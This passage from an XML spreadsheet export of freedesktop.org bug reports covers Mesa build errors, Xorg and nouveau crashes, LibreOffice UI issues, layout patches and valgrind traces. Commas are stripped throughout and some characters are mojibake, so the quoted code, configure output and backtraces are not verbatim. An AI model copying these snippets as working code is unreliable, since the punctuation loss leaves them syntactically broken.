Cursor.c: In function 'XFixesGetCursorImage':
Cursor.c:111: warning: pointer targets in passing argument 2 of '_XRead32'
differ in signedness</t>
  </si>
  <si>
    <t>MESA-109944</t>
  </si>
  <si>
    <t>[bisected] Android build test fails with: utils.c: error: use of undeclared identifier 'PACKAGE_VERSION'</t>
  </si>
  <si>
    <t xml:space="preserve">[ 39% 1228/3101] target  C: libmesa_dri_common_32 &lt;= vendor/intel/external/project-celadon/mesa/src/mesa/drivers/dri/common/utils.c
FAILED: out/target/product/cel_apl/obj_x86/STATIC_LIBRARIES/libmesa_dri_common_intermediates/utils.o
/bin/bash -c PWD=/proc/self/cwd  prebuilts/clang/host/linux-x86/clang-4691093/bin/clang        -I vendor/intel/external/project-celadon/mesa/include -I vendor/intel/external/project-celadon/mesa/src/egl/drivers/dri -I vendor/intel/external/project-celadon/mesa/src/egl/main -I vendor/intel/external/project-celadon/mesa/src/mapi -I vendor/intel/external/project-celadon/mesa/src/mesa -I vendor/intel/external/project-celadon/mesa/src/mesa/drivers/dri/common -I vendor/intel/external/project-celadon/mesa/src/util -I vendor/intel/external/project-celadon/mesa/src/gallium/include -I vendor/intel/external/project-celadon/mesa/src/gallium/auxiliary -I external/expat/lib -I vendor/intel/external/project-celadon/mesa/src -I vendor/intel/external/project-celadon/mesa/include -I vendor/intel/external/project-celadon/mesa/src/mesa/drivers/dri/common -I out/target/product/cel_apl/obj_x86/STATIC_LIBRARIES/libmesa_dri_common_intermediates -I out/target/product/cel_apl/gen/STATIC_LIBRARIES/libmesa_dri_common_intermediates \$(cat out/target/product/cel_apl/obj_x86/STATIC_LIBRARIES/libmesa_dri_common_intermediates/import_includes)   -isystem out/target/product/cel_apl/obj/include -c  -msse3 -mstackrealign -DANDROID -fmessage-length=0 -W -Wall -Wno-unused -Winit-self -Wpointer-arith -no-canonical-prefixes -DNDEBUG -UDEBUG -fno-exceptions -Wno-multichar -O2 -g -fno-strict-aliasing -fdebug-prefix-map=/proc/self/cwd= -D__compiler_offsetof=__builtin_offsetof -Werror=int-conversion -Wno-reserved-id-macro -Wno-format-pedantic -Wno-unused-command-line-argument -fcolor-diagnostics -Wno-expansion-to-defined -Wno-zero-as-null-pointer-constant -fdebug-prefix-map=\$PWD/= -ffunction-sections -fdata-sections -fno-short-enums -funwind-tables -fstack-protector-strong -Wa--noexecstack -D_FORTIFY_SOURCE=2 -Wstrict-aliasing=2 -Werror=return-type -Werror=non-virtual-dtor -Werror=address -Werror=sequence-point -Werror=date-time -Werror=format-security -nostdlibinc -m32 -march=prescott -target i686-linux-android -Bprebuilts/gcc/linux-x86/x86/x86_64-linux-android-4.9/x86_64-linux-android/bin   -std=gnu99    -Wno-error -Werror=incompatible-pointer-types -DANDROID_API_LEVEL=28 -DENABLE_SHADER_CACHE -D__STDC_CONSTANT_MACROS -D__STDC_LIMIT_MACROS -DHAVE___BUILTIN_EXPECT -DHAVE___BUILTIN_FFS -DHAVE___BUILTIN_FFSLL -DHAVE_DLFCN_H -DHAVE_FUNC_ATTRIBUTE_FLATTEN -DHAVE_FUNC_ATTRIBUTE_UNUSED -DHAVE_FUNC_ATTRIBUTE_FORMAT -DHAVE_FUNC_ATTRIBUTE_PACKED -DHAVE_FUNC_ATTRIBUTE_ALIAS -DHAVE_FUNC_ATTRIBUTE_NORETURN -DHAVE_FUNC_ATTRIBUTE_RETURNS_NONNULL -DHAVE_FUNC_ATTRIBUTE_WARN_UNUSED_RESULT -DHAVE___BUILTIN_CTZ -DHAVE___BUILTIN_POPCOUNT -DHAVE___BUILTIN_POPCOUNTLL -DHAVE___BUILTIN_CLZ -DHAVE___BUILTIN_CLZLL -DHAVE___BUILTIN_UNREACHABLE -DHAVE_PTHREAD=1 -DHAVE_DLADDR -DHAVE_DL_ITERATE_PHDR -DHAVE_LINUX_FUTEX_H -DHAVE_ENDIAN_H -DHAVE_ZLIB -DMAJOR_IN_SYSMACROS -DVK_USE_PLATFORM_ANDROID_KHR -fvisibility=hidden -fno-math-errno -fno-trapping-math -Wno-sign-compare -Wno-self-assign -Wno-constant-logical-operand -Wno-format -Wno-incompatible-pointer-types -Wno-enum-conversion -DHAVE_LIBDRM -D__ANDROID_API__=28 -D__ANDROID_VNDK__ -fPIC -DDEFAULT_DRIVER_DIR=\\\/vendor/lib/dri\\\ -D_USING_LIBCXX -DANDROID_STRICT -std=c99  -Werror=int-to-pointer-cast -Werror=pointer-to-int-cast -Werror=address-of-temporary -Werror=return-type -Wno-tautological-constant-compare -Wno-null-pointer-arithmetic -Wno-enum-compare -Wno-enum-compare-switch -MD -MF out/target/product/cel_apl/obj_x86/STATIC_LIBRARIES/libmesa_dri_common_intermediates/utils.d -o out/target/product/cel_apl/obj_x86/STATIC_LIBRARIES/libmesa_dri_common_intermediates/utils.o vendor/intel/external/project-celadon/mesa/src/mesa/drivers/dri/common/utils.c
vendor/intel/external/project-celadon/mesa/src/mesa/drivers/dri/common/utils.c:534:38: error: use of undeclared identifier 'PACKAGE_VERSION'
Bisected to this commit:
commit e1d81decf7a093867f051786a5d7f6ce4d827ff1
Author: Eric Engestrom 
Date:   Tue Nov 20 12:32:18 2018 +0000
    build: make passing an incorrect pointer type a hard error
    More or less any of this issue pointed out by the compiler is
    a coding error. Make sure we flag it and bail loudly.
    v2: - apply the change to autotools and scons as well (Emil)
        - C++ doesn't need this it's already an error and the flag
          doesn't exist (Gert)
    v3: - drop scons flags are not checked so until someone adds that
          functionality we can't have this.
    Signed-off-by: Eric Engestrom 
    Reviewed-by: Dylan Baker  # v1
    Reviewed-by: Emil Velikov  # v1
    [Emil: apply the same change to autotools and scons]
    Signed-off-by: Emil Velikov 
    Reviewed-by: Eric Anholt </t>
  </si>
  <si>
    <t>XORG-69168</t>
  </si>
  <si>
    <t>[NVA8]Arbitrary crashes</t>
  </si>
  <si>
    <t>Created attachment 85540
dmesg-log with log_buf_len=1M
Hi
using nouveau on arch linux my system crashes arbitrarily. I tried to force it with maximum load (running tons of videos in parallel) but it would crash with log on. Unplugging the external monitor was finally the trigger even though I am not sure if that is my actual problem. The picture on my external monitor looks crappy (don't know how to describe but some kind of fuzzy like Win 98) even though the right resolution 1920*1080 is used. 
uname -a
Linux wom 3.11.0-1-ARCH #1 SMP PREEMPT Tue Sep 3 08:58:01 CEST 2013 x86_64 GNU/Linux
lspci|grep NVIDIA
01:00.0 VGA compatible controller: NVIDIA Corporation GT218M [GeForce 310M] (rev a2)
01:00.1 Audio device: NVIDIA Corporation High Definition Audio Controller (rev a1)
xf86-video-nouveau-1.0.9-1
mesa-9.2.0-1
libdrm-2.4.46-2
Attached the dmesg-log with log_buf_len=1M</t>
  </si>
  <si>
    <t>wompy</t>
  </si>
  <si>
    <t>DBUS-100715</t>
  </si>
  <si>
    <t>Broken git URL in HACKING</t>
  </si>
  <si>
    <t>The HACKING file tells me that I should do:
    git clone git://git.freedesktop.org/dbus/dbus
but this doesn't work:
    Cloning into 'dbus'...
    fatal: remote error: access denied or repository not exported: /dbus/dbus</t>
  </si>
  <si>
    <t>CAIRO-29463</t>
  </si>
  <si>
    <t>BÃ©zier curve is not rendered correctly</t>
  </si>
  <si>
    <t>Created attachment 37737
Rendered output
Below is a code snippet and the result is attached as png file.
cairo_new_sub_path( cr )
cairo_move_to( cr 667.00 287.75 )
cairo_curve_to( cr 667.00 270.50
		643.50 253.75
		643.75 255.00 )
cairo_set_line_width( cr 12.0 )
cairo_stroke( cr )</t>
  </si>
  <si>
    <t>horakm</t>
  </si>
  <si>
    <t>XORG-31595</t>
  </si>
  <si>
    <t>Lib/libfontenc</t>
  </si>
  <si>
    <t>Insufficient check on zlib</t>
  </si>
  <si>
    <t>My build (in a quite minimal chroot) broke with:
  CC     encparse.lo
encparse.c:39:18: error: zlib.h: No such file or directory
encparse.c:40: error: expected â€˜=â€™ â€˜â€™ â€˜â€™ â€˜asmâ€™ or â€˜__attribute__â€™ before â€˜FontFilePtrâ€™
encparse.c:84: error: expected â€˜)â€™ before â€˜fâ€™
encparse.c:98: error: expected â€˜)â€™ before â€˜fâ€™
encparse.c:131: error: expected â€˜)â€™ before â€˜fâ€™
encparse.c:153: error: expected â€˜)â€™ before â€˜fâ€™
encparse.c:198: error: expected â€˜)â€™ before â€˜fâ€™
encparse.c:464: error: expected â€˜)â€™ before â€˜fâ€™
[â€¦]
I'm not sure configure.ac contains the needed bits:
# zlib
AC_CHECK_LIB(z gzclose)
Relevant bits of config.log:
configure:11773: checking for gzclose in -lz
configure:11798: gcc -o conftest -g -O2  -L/home/kibi/xorg-build/lib64  conftest.c -lz   &gt;&amp;5
/usr/bin/ld: cannot find -lz
collect2: ld returned 1 exit status
configure:11798: $? = 1
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME libfontenc
| #define PACKAGE_TARNAME libfontenc
| #define PACKAGE_VERSION 1.1.0
| #define PACKAGE_STRING libfontenc 1.1.0
| #define PACKAGE_BUGREPORT https://bugs.freedesktop.org/enter_bug.cgi?product=xorg
| #define PACKAGE_URL 
| #define PACKAGE libfontenc
| #define VERSION 1.1.0
| #define STDC_HEADERS 1
| #define HAVE_SYS_TYPES_H 1
| #define HAVE_SYS_STAT_H 1
| #define HAVE_STDLIB_H 1
| #define HAVE_STRING_H 1
| #define HAVE_MEMORY_H 1
| #define HAVE_STRINGS_H 1
| #define HAVE_INTTYPES_H 1
| #define HAVE_STDINT_H 1
| #define HAVE_UNISTD_H 1
| #define PACKAGE_VERSION_MAJOR 1
| #define PACKAGE_VERSION_MINOR 1
| #define PACKAGE_VERSION_PATCHLEVEL 0
| #define HAVE_DLFCN_H 1
| #define LT_OBJDIR .libs/
| /* end confdefs.h.  */
|
| /* Override any GCC internal prototype to avoid an error.
|    Use char because int might match the return type of a GCC
|    builtin and then its argument prototype would still apply.  */
| #ifdef __cplusplus
| extern C
| #endif
| char gzclose ()
| int
| main ()
| {
| return gzclose ()
|   
|   return 0
| }
configure:11807: result: no</t>
  </si>
  <si>
    <t>DRI-105716</t>
  </si>
  <si>
    <t>External display disconnected with docking station Dell TB16</t>
  </si>
  <si>
    <t>Created attachment 138317
Linux 4.16-rc6+ messages from suspend and resume
With Linux 4.16-rc6+ and mutter 3.28.0-2 from Debian Sid/unstable and a Dell XPS 13 9370 and docking station TB16 going in suspend and waking back up the external monitor is not detected according to the output of `xrandr` until reconnected.
It was also not detected during boot.
Please find the Linux kernel messages from suspend and resume with `drm.debug=0x1e` attached.</t>
  </si>
  <si>
    <t>LIBOIL-6348</t>
  </si>
  <si>
    <t>Patch from Fedora</t>
  </si>
  <si>
    <t>When updating my local FC5 liboil from 0.3.6 to 0.3.8 I noticed that there is a 
patch in Fedora's SRPM which doesn't seem to have gone upstream. Attaching.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-102438</t>
  </si>
  <si>
    <t>Possible duplicate word Russian in string</t>
  </si>
  <si>
    <t>In the file rules/base.xml.in:
Russian Russian (phonetic French)
Is this duplicate occurrence of Russian correct?</t>
  </si>
  <si>
    <t>XORG-37549</t>
  </si>
  <si>
    <t>Dell Studio XPS 1340 - fails to enter suspend mode</t>
  </si>
  <si>
    <t>This problem was originally reported here:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/754711
The system works correctly with the Ubuntu-patched 2.6.35 Kernel as shipped with Ubuntu 10.10 but fails with the 2.6.38 kernel from Ubuntu 11.04.
While tracking down this problem I tested several mainline kernels all of which also fail to suspend/resume on this system as I describe below.
Steps to reproduce:
- try to enter suspend mode (I used sudo pm-suspend)
Expected result:
- The system enters sleep mode and upon pressing the power switch resumes successfully
Actual result:
I tried this with the following kernels (all mainline):
2.6.39-999.201104080911 - The system enters suspend mode but upon trying to resume the system is unresponsive: backlight doesn't come on there is no display keyboard is unresponsive and system doesn't respond to pings on the network.
2.6.38-3-natty mainline kernel. The system boots and is usable enters suspend mode but upon attempting to resume is unresponsive the backlight doesn't come up no display keyboard is unresponsive and system doesn't respond to pings on the network. At some point I saw capslock flashing but it stopped after a bit.
v2.6.35.12-maverick mainline kernel with this kernel the system boots but when trying to enter graphical mode becomes unresponsive no keyboard network ping or display (screen is black). 
Here is some relevant information on the system please let me know if any more tests are needed.
dmi.bios.date: 09/08/2009
dmi.bios.vendor: Dell Inc.
dmi.bios.version: A11
dmi.board.name: 0K183D
dmi.board.vendor: Dell Inc.
dmi.board.version: A11
dmi.chassis.asset.tag: 1234567890
dmi.chassis.type: 8
dmi.chassis.vendor: Dell Inc.
dmi.chassis.version: A11
dmi.modalias: dmi:bvnDellInc.:bvrA11:bd09/08/2009:svnDellInc.:pnStudioXPS1340:pvrA11:rvnDellInc.:rn0K183D:rvrA11:cvnDellInc.:ct8:cvrA11:
dmi.product.name: Studio XPS 1340
dmi.product.version: A11
dmi.sys.vendor: Dell Inc.
GraphicsCard:
02:00.0 VGA compatible controller [0300]: nVidia Corporation G98 [GeForce 9200M GS] [10de:06e8] (rev a1) (prog-if 00 [VGA controller])
	Subsystem: Dell Device [1028:0271]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 23
	Region 0: Memory at ae000000 (32-bit non-prefetchable) [size=16M]
	Region 1: Memory at d0000000 (64-bit prefetchable) [size=256M]
	Region 3: Memory at ac000000 (64-bit non-prefetchable) [size=32M]
	Region 5: I/O ports at 4000 [size=128]
	Capabilities: 
	Kernel driver in use: nouveau
	Kernel modules: nouveau nvidiafb
03:00.0 VGA compatible controller [0300]: nVidia Corporation C79 [GeForce 9400M G] [10de:0866] (rev b1) (prog-if 00 [VGA controller])
	Subsystem: Dell Device [1028:0271]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 18
	Region 0: Memory at aa000000 (32-bit non-prefetchable) [size=16M]
	Region 1: Memory at b0000000 (64-bit prefetchable) [size=256M]
	Region 3: Memory at cc000000 (64-bit prefetchable) [size=32M]
	Region 5: I/O ports at 5000 [size=128]
	[virtual] Expansion ROM at c0000000 [disabled] [size=128K]
	Capabilities: 
	Kernel driver in use: nouveau
	Kernel modules: nouveau nvidiafb</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-14785</t>
  </si>
  <si>
    <t>Joining planet.freedesktop.org</t>
  </si>
  <si>
    <t>I want to be cool like my friends and be on planet.fd.o :-) I can bribe with ice cream if there's interest...
Feed: http://www.vuntz.net/journal/feed/en/rss2
Hackergotchi: http://planet.gnome.org/heads/vuntz.png</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-84789</t>
  </si>
  <si>
    <t>Adding Azerty Russian layout support</t>
  </si>
  <si>
    <t>Created attachment 107538
updated ru file containing the phonetic_azerty and phonetic_azerty_fr layouts
Bug Description
Users of azerty keyboards lack of Russian phonetic layout. Their only option is to use phonetic qwerty. This is not really acceptable so I propose to add support with the attached patches for azerty Russian phonetic wit the following variants:
 - ru(phonetic_azerty): basic phonetic azerty
 - ru(phonetic_fr): French specific phonetic azerty. This completes the 3rd level following the French layout (Alt Gr + a key)
base.xml.patch patches /usr/share/X11/xkb/rules/base.xml
base.lst.patch patches /usr/share/X11/xkb/rules/base.lst
evdev.xml.patch patches /usr/share/X11/xkb/rules/evdev.xml
ru.patch patches /usr/share/X11/xkb/symbols/ru
Please tell me if anything is wrong or could be improved. Please also note that I know almost nothing of the Russian language and its Cyrillic alphabet so there could be errors.
We also could want to add this layout for users coming from Windows and used to it : http://tnit.fr/aa.htm
Cheers
RaphaÃ«l.
(I originally posted this bug at https://bugs.launchpad.net/ubuntu/+source/xkeyboard-config/+bug/1375445)</t>
  </si>
  <si>
    <t>raphael.jakse</t>
  </si>
  <si>
    <t>LIBREOFFICE-65385</t>
  </si>
  <si>
    <t>Lightproof: UI translation must be kept out of pootle</t>
  </si>
  <si>
    <t>Created attachment 80318
translated properties file for pt-BR LightProof UI
Sentence checking is implemented thru Lightproof and is closely tied to the language.
Some languages have rules that do not match en_US set of rules. These extra rules are not covered by pootle because there is no entry for them. The present scheme created localized UI based on the en_US UI and thus extra entries appears untranslated.
For example pt-BR version of LightProof implements pleonasms and paronyms detections. These rules are not in the en_US version of Lightproof.
The build system creates the localized *.properties files based on the american properties file.
Local Lightproof developers can supply easily the localized properties file. To simplify the translation process I suggest we remove LightProof UI from pootle and get the translated file directly from LP developers.
See gerrit commit http://gerrit.libreoffice.org/#/c/4146/ for the pt-BR example
At least in the pt-BR case this can be easily fixed.</t>
  </si>
  <si>
    <t>XORG-10241</t>
  </si>
  <si>
    <t>Xlib:  extension GLX missing on display :0.0.</t>
  </si>
  <si>
    <t># glxinfo
name of display: :0.0
Xlib:  extension GLX missing on display :0.0.
Xlib:  extension GLX missing on display :0.0.
Xlib:  extension GLX missing on display :0.0.
Error: couldn't find RGB GLX visual
   visual  x  bf lv rg d st colorbuffer ax dp st accumbuffer  ms  cav
 id dep cl sp sz l  ci b ro  r  g  b  a bf th cl  r  g  b  a ns b eat
----------------------------------------------------------------------
Xlib:  extension GLX missing on display :0.0.
Xlib:  extension GLX missing on display :0.0.
0x21 24 tc  1  0  0 c  .  .  0  0  0  0  0  0  0  0  0  0  0  0 0 None
Xlib:  extension GLX missing on display :0.0.
Xlib:  extension GLX missing on display :0.0.
0x22 24 dc  1  0  0 c  .  .  0  0  0  0  0  0  0  0  0  0  0  0 0 None
my distribution is gentoo
my kernel is the 2.6.20 with DRM for the radeon
my card is:
01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility X700
(PCIE) (prog-if 00 [VGA])
        Subsystem: Sony Corporation Unknown device 81e8
        Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr-
Stepping- SERR- FastB2B-
        Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort-
SERR- &lt;PERR-
        Latency: 0 Cache Line Size: 64 bytes
        Interrupt: pin A routed to IRQ 17
        Region 0: Memory at c8000000 (32-bit prefetchable) [size=128M]
        Region 1: I/O ports at 5000 [size=256]
        Region 2: Memory at b8100000 (32-bit non-prefetchable) [size=64K]
        [virtual] Expansion ROM at b8120000 [disabled] [size=128K]
        Capabilities: [50] Power Management version 2
                Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA
PME(D0-D1-D2-D3hot-D3cold-)
                Status: D0 PME-Enable- DSel=0 DScale=0 PME-
        Capabilities: [58] Express Endpoint IRQ 0
                Device: Supported: MaxPayload 128 bytes PhantFunc 0 ExtTag+
                Device: Latency L0s &lt;256ns L1 &lt;4us
                Device: AtnBtn- AtnInd- PwrInd-
                Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported-
                Device: RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+
                Device: MaxPayload 128 bytes MaxReadReq 128 bytes
                Link: Supported Speed 2.5Gb/s Width x16 ASPM L0s L1 Port 0
                Link: Latency L0s &lt;256ns L1 &lt;2us
                Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch-
                Link: Speed 2.5Gb/s Width x16
        Capabilities: [80] Message Signalled Interrupts: 64bit+ Queue=0/0
Enable-
                Address: 0000000000000000  Data: 0000
        Capabilities: [100] Advanced Error Reporting</t>
  </si>
  <si>
    <t>GNUtoo</t>
  </si>
  <si>
    <t>XORG-21450</t>
  </si>
  <si>
    <t>[GM965] GDM causes Xorg segfault with recent DRI2GetBuffersWithFormat changes</t>
  </si>
  <si>
    <t>idr's recent xserver commit adding support for DRI2GetBuffersWithFormat causes Xorg to segfault when drawing the gdm greeter. Reverting the change avoids the crash. This is on GM965 with mesa drm xserver and xf86-video-intel from git and a kernel tree linus's master.
commit ff6c7764c2909e4126403b7211faa6c58556b341
Author: Ian Romanick 
Date:   Fri Apr 24 12:49:19 2009 -0700
    DRI2: Implement protocol for DRI2GetBuffersWithFormat
Loaded symbols for /lib64/libgcc_s.so.1
__lll_lock_wait () at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
136	2:	movl	%edx %eax
(gdb) up 12
#12 0x0000003f43e04fa5 in drm_intel_gem_bo_unreference_locked (
    bo=) at intel_bufmgr_gem.c:585
585		    DRMLISTADDTAIL(
(gdb) bt
#0  __lll_lock_wait ()
    at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
#1  0x0000003b3ae09005 in _L_lock_949 () from /lib64/libpthread.so.0
#2  0x0000003b3ae08e28 in __pthread_mutex_lock (mutex=0x8ae6b0)
    at pthread_mutex_lock.c:61
#3  0x0000003f43e04d15 in drm_intel_gem_bo_unmap (bo=0x377bb90)
    at intel_bufmgr_gem.c:768
#4  0x00007f2b9e274201 in intel_batch_flush (pScrn=0x8a9320 flushed=128)
    at i830_batchbuffer.c:197
#5  0x00007f2b9e273a4b in I830Sync (pScrn=0x8a9320) at i830_accel.c:193
#6  0x00007f2b9e281a0f in I830LeaveVT (scrnIndex= 
    flags=) at i830_driver.c:3428
#7  0x000000000044b2e5 in AbortDDX () at xf86Init.c:1438
#8  0x000000000043eced in AbortServer () at log.c:404
#9  0x000000000043f38e in FatalError (
    f=0x56dcb8 Caught signal %d (%s). Server aborting\n) at log.c:529
#10 0x000000000043c474 in OsSigHandler (signo=11 sip=0x7f2b9e274488 
    unused=) at osinit.c:152
#11 
#12 0x0000003f43e04fa5 in drm_intel_gem_bo_unreference_locked (
    bo=) at intel_bufmgr_gem.c:585
#13 0x0000003f43e04ee5 in drm_intel_gem_bo_unreference_locked (bo=0x380d220)
    at intel_bufmgr_gem.c:561
---Type  to continue or q  to quit---
#14 0x0000003f43e04ee5 in drm_intel_gem_bo_unreference_locked (bo=0x380df50)
    at intel_bufmgr_gem.c:561
#15 0x0000003f43e053ac in drm_intel_gem_bo_unreference (bo=0x380df50)
    at intel_bufmgr_gem.c:599
#16 0x00007f2b9e2adf37 in i965_prepare_composite (op= 
    pSrcPicture=0x37ce740 pMaskPicture=0x0 
    pDstPicture= pSrc= pMask=0x0 
    pDst=0x37cdc70) at i965_render.c:1350
#17 0x00007f2b9e2bec3f in uxa_try_driver_composite (op=0 '\0' pSrc=0x37ce740 
    pMask=0x0 pDst=0x37cf290 xSrc= 
    ySrc= xMask= 
    yMask= xDst=0 yDst=0 width= 
    height=) at uxa-render.c:489
#18 0x00007f2b9e2bfbaf in uxa_composite (op= 
    pSrc=0x37ce740 pMask=0x0 pDst=0x37cf290 xSrc=16368 
    ySrc= xMask=0 yMask=0 xDst=0 yDst=0 width=4 
    height=25) at uxa-render.c:747
#19 0x00000000004d3ba0 in damageComposite (op=0 '\0' 
    pSrc= pMask= pDst=0x37cf290 
    xSrc=-6480 ySrc=6737 xMask= 
    yMask= xDst=0 yDst=0 width=4 
    height=) at damage.c:643
#20 0x00000000004c847c in ProcRenderComposite (client=0x378d5f0)
---Type  to continue or q  to quit---
    at render.c:719
#21 0x000000000042a284 in Dispatch () at dispatch.c:428
#22 0x0000000000424405 in main (argc=8 argv=0x7ce4c8 
    envp=) at main.c:396</t>
  </si>
  <si>
    <t>LIBREOFFICE-56807</t>
  </si>
  <si>
    <t>Mail merge: single print jobs doesn't work with Hylafax</t>
  </si>
  <si>
    <t>Hi
I've got problems with mail merge and faxsimile on libreoffice 3.5.4 kubuntu 12.04 and debian wheezy libreoffice 3.5.4 also.
I've created an spreadsheet file like this
Name    Number
TEST1   0815
TEST2   0816
and save it as TESTFAX.ods
Thereafter I created an FAX.odt file in which I inserted a new database TESTFAX.ods menu-&gt;insert-&gt;Fields-&gt; Tab Database -&gt; Add database file -&gt; Browse...
After that I selected the Mail merge fields  and  and inserted them into the text like this:
  @@#@@
Then pressing  for print and selected Yes for form letter.
In Mail Merge I selected all and get the Print Dialog where I selected the printer faxprinter (installed via spadmin and working with single file). There I went to Tab Options an selected 'Create single print job for collated output' and 'Use only paper tray from printer preferences' also either of them.
As result I received each number 0815 and 0816 received one file with two pages containing the whole merge mail. Till openoffice 3.2.1 (last used version on debian squeeze aka UCD 3.0) you selected in Dialog Mail Merge 'print single jobs' and each job was splitted into the different numbers where I wanted to send them.
I'm quit confused because the same description stand inside the documentation.
I'm sincerely sorry for my bad english but I suppose german wouldn't be an option in an international bug list.
Thanks for your help in advance.
Volker</t>
  </si>
  <si>
    <t>nevyn</t>
  </si>
  <si>
    <t>MESA-8319</t>
  </si>
  <si>
    <t>Swedish translation of DRI driver options</t>
  </si>
  <si>
    <t>Here is the Swedish translation of DRI driver options.
File found at Mesa/src/mesa/drivers/dri/common/xmlpool/sv.po
Translation available at:
http://home.danielnylander.se/translations/mesa/sv.po</t>
  </si>
  <si>
    <t>po</t>
  </si>
  <si>
    <t>WAYLAND-91886</t>
  </si>
  <si>
    <t>Weston (1.8.92) segfaults during tear-down due to deletion of NULL `backend` when using RPi backend</t>
  </si>
  <si>
    <t>Created attachment 118088
Patch to prevent segfault in teardown when using RPi backend
When running with the RPi backend Weston sefaults during shutdown. This is due to the fact that `compositor-&gt;backend` is never initialised and there is no NULL check prior to calling `destroy()`.
I'm attaching a small patch that fixes the issue by making `rpi_backend_create()` intialise `compositor-&gt;backend` - just like the X11 backend does. Please consider this patch for inclusion on master.</t>
  </si>
  <si>
    <t>deathofathousandpapercuts</t>
  </si>
  <si>
    <t>LIBREOFFICE-63607</t>
  </si>
  <si>
    <t>Cut Paste Undo loses conditional format</t>
  </si>
  <si>
    <t>Simplest form to reproduce
New Spreadsheet
Conditional Format cell if 0 Heading 1
Enter 0 in cell
Cut cell and paste elsewhere
Undo x 2 
Result loss of conditional formatting</t>
  </si>
  <si>
    <t>MESA-81379</t>
  </si>
  <si>
    <t>invalid reads from brw::vec4_visitor</t>
  </si>
  <si>
    <t>==20519== Invalid read of size 4
==20519==    at 0x5B7F704: brw::vec4_visitor::opt_cse_local(bblock_t* exec_list*) (brw_vec4_cse.cpp:229)
==20519==    by 0x5B7FA15: brw::vec4_visitor::opt_cse() (brw_vec4_cse.cpp:265)
==20519==    by 0x5B7E6E3: brw::vec4_visitor::run() (brw_vec4.cpp:1681)
==20519==    by 0x5B7E8A6: brw_vs_emit (brw_vec4.cpp:1757)
==20519==    by 0x5B97088: do_vs_prog (brw_vs.c:293)
==20519==    by 0x5B979AD: brw_vs_precompile (brw_vs.c:542)
==20519==    by 0x5B76E84: brw_link_shader (brw_shader.cpp:79)
==20519==    by 0x5A65045: _mesa_glsl_link_shader (ir_to_mesa.cpp:3082)
==20519==    by 0x596EE49: link_program (shaderapi.c:915)
==20519==    by 0x4047E5: init(gfxinfo_t* void*) (in /home/tpalli/test_animation)
==20519==    by 0x403A8A: TestApplication::exec(unsigned int) (in /home/tpalli/test_animation)
==20519==    by 0x404B88: main (in /home/tpalli/test_animation)
==20519==  Address 0x69c2408 is 16 bytes after a block of size 40 alloc'd
==20519==    at 0x4A081D4: calloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==20519==    by 0x5B07781: ralloc_size (ralloc.c:113)
==20519==    by 0x5B27AB5: cfg_t::cfg_t(exec_list*) (brw_cfg.cpp:89)
==20519==    by 0x5B84A80: brw::vec4_visitor::calculate_live_intervals() (brw_vec4_live_variables.cpp:251)
==20519==    by 0x5B7C51A: brw::vec4_visitor::dead_code_eliminate() (brw_vec4.cpp:366)
==20519==    by 0x5B7E6AF: brw::vec4_visitor::run() (brw_vec4.cpp:1677)
==20519==    by 0x5B7E8A6: brw_vs_emit (brw_vec4.cpp:1757)
==20519==    by 0x5B97088: do_vs_prog (brw_vs.c:293)
==20519==    by 0x5B979AD: brw_vs_precompile (brw_vs.c:542)
==20519==    by 0x5B76E84: brw_link_shader (brw_shader.cpp:79)
==20519==    by 0x5A65045: _mesa_glsl_link_shader (ir_to_mesa.cpp:3082)
==20519==    by 0x596EE49: link_program (shaderapi.c:915)</t>
  </si>
  <si>
    <t>REALMD-64182</t>
  </si>
  <si>
    <t>Add manual page for realmd.conf</t>
  </si>
  <si>
    <t>We should have a manual page for realmd.conf in addition to the web page about configuring realmd:
http://www.freedesktop.org/software/realmd/docs/guide-configuring.html</t>
  </si>
  <si>
    <t>TELEPATHY-24067</t>
  </si>
  <si>
    <t>Doesn't set the Secret flag on passwords</t>
  </si>
  <si>
    <t>I was wondering why MC didn't move my facebook password to gnome-keyring. It seems that's because the 'password' param doesn't have the Secret flag. A quick look in telepathy-inspector seems to show that all the protocols have this issue.</t>
  </si>
  <si>
    <t>LIBREOFFICE-36923</t>
  </si>
  <si>
    <t>UI problems under KDE SC 4.6.2</t>
  </si>
  <si>
    <t>Created attachment 46410
Screen shot showing the problem
On the attached screen shot the app in the background is LibO 3.4 beta 3 while that on top is LibO 3.3.2 both on openSUSE 11.4 64 bits.
As you can see 3.4 beta is having trouble with desktop integration (it uses some general UI decoration) and it also have *severe* repainting problems not present on 3.3.2.
It seems that 3.4 beta is not reading neither the kde nor the gtk vcl plugin.
Using OOO_FORCE_DESKTOP=kde/gnome/native or QT_GRAPHICSSYSTEM=native does not change the problem (just the icon theme).</t>
  </si>
  <si>
    <t>MESA-7353</t>
  </si>
  <si>
    <t>glxextensions.c - use of uninitialized memory</t>
  </si>
  <si>
    <t>There is a small bug at in file glxextensions.c at line 321
----------------------------
static void
__glXProcessServerString( const struct extension_info * ext
                          const char * server_string
                          unsigned char * server_support )
{
   unsigned  base
   unsigned  len
